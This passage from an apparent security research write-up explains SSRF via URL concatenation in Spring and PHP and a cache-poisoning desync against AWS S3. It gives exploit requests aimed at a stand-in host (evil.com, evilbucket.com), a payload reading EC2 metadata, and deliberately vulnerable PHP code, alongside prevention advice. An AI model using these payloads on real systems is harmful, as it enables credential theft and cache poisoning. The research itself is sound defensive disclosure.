The code snippet above utilizes the HttpServletRequest API to retrieve the requested URL through the getRequestURI() function. Subsequently, it concatenates the requested URI with the destination endpoint http://ifconfig.me.

Since Spring permits any character after the matrix parameter separator, it is also possible to use the @ character to fetch an arbitrary endpoint.

Below is an example of the exploit request:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server Case Study - SSRF Through Incorrect Pathname Interpretation

The PHP built-in web server suffers from the same vulnerability. Still, the built-in server is not used in production environments, so I decided to present this behavior as a case study that is unlikely to happen in real-world applications.

Surprisingly, PHP allows the asterisk * character before the first slash in the pathname, and between the asterisk and the first slash, almost all ASCII characters are accepted as part of a valid HTTP request.

However, there are two limitations that arise with PHP:

This technique can only be used for the root pathname / and cannot be applied to other endpoints. In other words, the vulnerable code must be in the index.php file;
Dots . are not allowed before the first slash, which restricts the inclusion of arbitrary IPs and domains. To circumvent this, the payload must include the dotless-hex encoded IP address of the malicious domain.

Let's consider the following PHP code for this exploitation scenario:


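<?php
// Destination site; note the missing trailing slash after the domain.
$site = "http://ifconfig.me";
// Raw request target exactly as sent by the client.
$current_uri = $_SERVER['REQUEST_URI'];

// Vulnerable concatenation: the client controls everything after the domain.
$proxy_site = $site.$current_uri;
var_dump($proxy_site);

echo "\n\n";

// Server-side request to the resulting URL.
$response = file_get_contents($proxy_site);
var_dump($response);
?>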

The provided code retrieves the HTTP request pathname using $_SERVER['REQUEST_URI'] and concatenates it with the destination domain.

For performing IP address dotless-hex encoding, you can utilize the tool ip-encoder.py.
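
The encoding itself is simple enough to sketch with the Python standard library. This is not the ip-encoder.py tool, only an illustration of the same idea, and the function names dotless_hex and from_dotless_hex are hypothetical:

```python
import ipaddress


def dotless_hex(ip: str) -> str:
    """Encode a dotted-quad IPv4 address as a single hexadecimal integer."""
    return hex(int(ipaddress.IPv4Address(ip)))


def from_dotless_hex(value: str) -> str:
    """Decode the hexadecimal form back to dotted-quad notation."""
    return str(ipaddress.IPv4Address(int(value, 16)))


print(dotless_hex("169.254.169.254"))  # prints 0xa9fea9fe
print(from_dotless_hex("0xa9fea9fe"))  # prints 169.254.169.254
```

Since the encoded form contains no dots, it satisfies the restriction on characters before the first slash.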

The resulting payload, which fetches the EC2 metadata, is as follows:

GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

In the following proof of concept, I successfully retrieved my EC2 metadata:

How to prevent

Always use a complete base URL when concatenating it with user input. For instance, ensure that a trailing slash is added after the domain name, such as http://ifconfig.me/.
Use a reverse proxy that handles HTTP requests correctly. The vulnerabilities mentioned are typically only possible if the framework is used without a reverse proxy that validates the HTTP pathname, so placing one in front of the application can significantly enhance its security.
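
The first recommendation can be sketched in Python as follows. The function name build_upstream_url is hypothetical, and the extra authority check is an assumption added here as defense in depth (it rejects a base URL that was configured without the trailing slash), not something the original examples contain:

```python
from urllib.parse import urlsplit


def build_upstream_url(base: str, request_path: str) -> str:
    """Join base and a client-supplied path, refusing any change of host."""
    candidate = base + request_path.lstrip("/")
    expected = urlsplit(base)
    actual = urlsplit(candidate)
    # The scheme and authority must be identical before and after joining.
    if (actual.scheme, actual.netloc) != (expected.scheme, expected.netloc):
        raise ValueError(f"refusing to proxy to {actual.netloc!r}")
    return candidate


# With the trailing slash, the payload stays inside the path component.
print(build_upstream_url("http://ifconfig.me/", ";@evil.com/url"))
```

With the base http://ifconfig.me (no trailing slash) the same call raises ValueError, because the joined string would resolve to a different authority.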

HTTP Desync Cache Poisoning Attacks

Inconsistencies exist among servers and reverse proxies when it comes to removing invalid invisible characters from header names before interpreting them. This inconsistency can lead to notable vulnerabilities, such as HTTP Request Smuggling. But in this section, I will discuss a vulnerability and technique that I discovered during my research that combines Desync attacks with Cache Poisoning, which affects cache servers when integrated with AWS S3 buckets.

But before we continue, we must understand some functionalities of cache servers.

Cache Keys

Cache keys are unique identifiers used by cache servers to store and retrieve cached data. They serve as references or labels that allow access to cached content.

The most frequently used cache key is typically derived from the URL's pathname. When a user sends a request to a server that utilizes caching, the cache server employs the requested URL to locate the corresponding cached response to serve back to the user.

In addition to the URL's pathname, another default cache key is the Host header. Let's consider a scenario where a cached JavaScript file is located at https://target.com/static/main.js. When a user sends an HTTP request to this cached URL, the cache server will return the stored response without having to forward the request to the backend server.

However, if a user sends an HTTP request to the same endpoint but modifies the Host header to 1337.target.com, the cache server will attempt to retrieve the response for the /static/main.js URL from the backend using the 1337.target.com Host header. Subsequently, it will store a separate response for that particular combination of host and pathname.
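
The behavior described above can be modeled with a small Python sketch. It is a toy model under stated assumptions: the key is just the (Host, pathname) pair, the host is lowercased, and the names cache_key, fetch and backend are hypothetical. Real cache servers have configurable keys:

```python
from typing import Callable, Dict, Tuple

CacheKey = Tuple[str, str]
cache: Dict[CacheKey, bytes] = {}


def cache_key(host: str, path: str) -> CacheKey:
    """Build a cache key from the Host header and the URL pathname."""
    return (host.lower(), path)


def fetch(host: str, path: str, backend: Callable[[str, str], bytes]) -> bytes:
    """Return the cached body, calling the backend only on a cache miss."""
    key = cache_key(host, path)
    if key not in cache:
        cache[key] = backend(host, path)
    return cache[key]


calls = []


def backend(host: str, path: str) -> bytes:
    calls.append((host, path))  # record every request that reaches the backend
    return f"response for {host}{path}".encode()


fetch("target.com", "/static/main.js", backend)       # miss: goes to the backend
fetch("target.com", "/static/main.js", backend)       # hit: served from the cache
fetch("1337.target.com", "/static/main.js", backend)  # different Host: new entry
print(len(calls), len(cache))
```

Only two requests reach the backend, and the cache ends up holding two separate entries for the same pathname.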

S3 HTTP Desync Cache Poisoning Issue

In this section, I will demonstrate an HTTP Desync vulnerability that can result in Cache Poisoning, primarily affecting AWS S3 buckets.

In AWS S3, the Host header plays a crucial role in routing requests to the correct bucket and enabling proper access to the stored content. When interacting with an S3 bucket, the Host header helps direct requests to the appropriate endpoint within the AWS infrastructure.

When a request is made to an S3 bucket, the AWS infrastructure inspects the Host header to determine the target bucket. So if a user sends an HTTP request to the domain your.s3.amazonaws.com but changes the host header to my.s3.amazonaws.com, internally, AWS will "ignore" the domain name, fetching the bucket specified in the host header only. This is a common practice on Cloud services.

The Vulnerability

The interpretation of host headers for S3 buckets involves two key aspects:

When multiple host headers are included in the request, only the first one will be taken, and any additional headers will be ignored;
The following bytes are ignored if present in the header name: \x1f, \x1d, \x0c, \x1e, \x1c, \x0b.

The vulnerability arises from an inconsistency in the host header interpretation. If the cache server treats the ignored bytes as part of the header name and therefore regards the header as an invalid host header, while S3 interprets it as a valid host header, it becomes possible to cache arbitrary S3 bucket responses on vulnerable websites.

Consider the following exploitation request:

GET / HTTP/1.1
[\x1d]Host: evilbucket.com
Host: example.bucket.com
Connection: close

First, the cache server examines the header \x1dHost: evilbucket.com and treats it like any other unkeyed header;
Next, the cache server correctly interprets Host: example.bucket.com as the valid host header, so the cached response is associated with this host value;
Upon reaching S3, the header \x1dHost: evilbucket.com is interpreted as a valid host header because the \x1d byte is ignored, while the intended Host: example.bucket.com header is discarded as a duplicate. As a result, AWS fetches the bucket named in the malicious header.
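
The steps above can be sketched as a toy model in Python. It is not the actual parsing code of any cache server or of S3. The two functions are hypothetical stand-ins that implement only the two rules described earlier (first Host header wins, listed bytes are ignored in header names):

```python
IGNORED_BYTES = "\x1f\x1d\x0c\x1e\x1c\x0b"  # bytes listed above as ignored by S3

RAW_HEADERS = [
    ("\x1dHost", "evilbucket.com"),
    ("Host", "example.bucket.com"),
    ("Connection", "close"),
]


def cache_host(headers):
    """Strict parser: only a header named exactly Host is used for the cache key."""
    for name, value in headers:
        if name.lower() == "host":
            return value
    return None


def origin_host(headers):
    """Lenient parser: drops the ignored bytes from names, then takes the first Host."""
    strip_table = {ord(b): None for b in IGNORED_BYTES}
    for name, value in headers:
        if name.translate(strip_table).lower() == "host":
            return value
    return None


print("cache key host:", cache_host(RAW_HEADERS))   # example.bucket.com
print("origin serves: ", origin_host(RAW_HEADERS))  # evilbucket.com
```

The two parsers disagree on which host the request is for, so the content of one bucket is stored under the cache key of another.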

The final result is a complete cache poisoning of the page with arbitrary content.

The proof of concept video demonstrates the exploitation of this vulnerability in an outdated Varnish cache server. It is important to note that newer versions of Varnish are not susceptible to this vulnerability:

https://www.youtube.com/watch?v=dnf6Zi5eNW8

In addition to Varnish, other cache servers such as Akamai were also vulnerable to this issue. However, it's important to note that this vulnerability has been addressed and cannot be reproduced on any AWS service today.

Conclusion

In conclusion, this research delved into the realm of security vulnerabilities in web applications, specifically focusing on HTTP parsers and the implications they can have on overall security. By exploring inconsistencies in HTTP parsers across various technologies, such as load balancers, reverse proxies, web servers, and caching servers, I unveiled potential avenues for exploitation.

I demonstrated how certain behaviors, like path normalization and the acceptance of special characters, can lead to bypassing security rules and even opening the door to Server-Side Request Forgery (SSRF) and Cache Poisoning vulnerabilities.

Moreover, I highlighted the significance of utilizing reverse proxies that effectively validate and sanitize HTTP requests. Implementing a robust reverse proxy can significantly bolster the security posture of a web application by intercepting and filtering malicious requests before they reach the backend servers.